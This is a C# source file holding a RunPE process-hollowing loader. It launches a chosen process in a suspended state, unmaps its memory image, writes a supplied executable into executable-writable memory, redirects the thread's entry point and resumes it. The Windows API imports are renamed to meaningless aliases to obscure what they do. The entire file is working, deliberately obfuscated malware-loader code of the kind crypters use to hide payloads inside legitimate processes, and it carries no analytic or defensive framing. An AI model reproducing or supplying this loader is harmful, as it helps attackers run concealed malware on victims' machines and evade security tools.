using Microsoft.VisualBasic;
using System;
using System.Collections;
using System.Collections.Generic;
using System.Data;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

public class RunPEClas
{
	[DllImport("kernel32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	private static extern bool V1(string V2, StringBuilder V3, IntPtr V4, IntPtr V5, 	[MarshalAs(UnmanagedType.Bool)]
bool inherit, int creation, IntPtr env, string V6, byte[] V7, IntPtr[] V8);
	[DllImport("kernel32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	private static extern bool V9(IntPtr hThr, uint[] ctxt);
	[DllImport("ntdll")]
	private static extern uint V10(IntPtr hProc, IntPtr baseAddr);
	[DllImport("kernel32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	private static extern bool V11(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
	[DllImport("kernel32.dll")]
	private static extern uint V12(IntPtr hThread);
	[DllImport("kernel32")]
	[return: MarshalAs(UnmanagedType.Bool)]
	private static extern bool V13(IntPtr hThr, uint[] ctxt);
	[DllImport("kernel32")]
	private static extern IntPtr V14(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
	[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
	private static extern bool V15(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
	[DllImport("kernel32.dll", SetLastError = true)]
	private static extern bool V16(IntPtr hProcess, IntPtr V21, byte[] lpBuffer, uint nSize, int V22);

	public static bool Func1(byte[] bytes, string surrogateProcess)
	{
		try {
			IntPtr V4 = IntPtr.Zero;
			IntPtr[] V17 = new IntPtr[4];
			byte[] V18 = new byte[68];

			int num2 = BitConverter.ToInt32(bytes, 60);
			int num = BitConverter.ToInt16(bytes, num2 + 6);
			IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));

			if (V1(null, new StringBuilder(surrogateProcess), V4, V4, false, 4, V4, null, V18, V17)) {
				uint[] ctxt = new uint[179];
				ctxt[0] = 0x10002;
				if (V9(V17[1], ctxt)) {
					IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);

					IntPtr V19 = IntPtr.Zero;
					IntPtr V20 = new IntPtr(4);

					IntPtr numRead = IntPtr.Zero;

					if (V11(V17[0], baseAddr, ref V19, Convert.ToInt32(V20), ref numRead) && (V10(V17[0], V19) == 0)) {
						IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
						IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
						IntPtr V21 = V14(V17[0], addr, size, 0x3000, 0x40);

						int V22 = 0;

						V16(V17[0], V21, bytes, Convert.ToUInt32(Convert.ToInt32(ptr4)), V22);
						int num5 = num - 1;
						for (int i = 0; i <= num5; i++) {
							int[] dst = new int[10];
							Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
							byte[] buffer2 = new byte[(dst[4] - 1) + 1];
							Buffer.BlockCopy(bytes, dst[5], buffer2, 0, buffer2.Length);

							size = new IntPtr(V21.ToInt32() + dst[3]);
							addr = new IntPtr(buffer2.Length);

							V16(V17[0], size, buffer2, Convert.ToUInt32(addr), V22);
						}
						size = new IntPtr(ctxt[0x29] + 8L);
						addr = new IntPtr(4);

						V16(V17[0], size, BitConverter.GetBytes(V21.ToInt32()), Convert.ToUInt32(addr), V22);
						ctxt[0x2c] = Convert.ToUInt32(V21.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
						V13(V17[1], ctxt);
					}
				}
				V12(V17[1]);
			}
		} catch {
			return false;
		}
		return true;
	}
}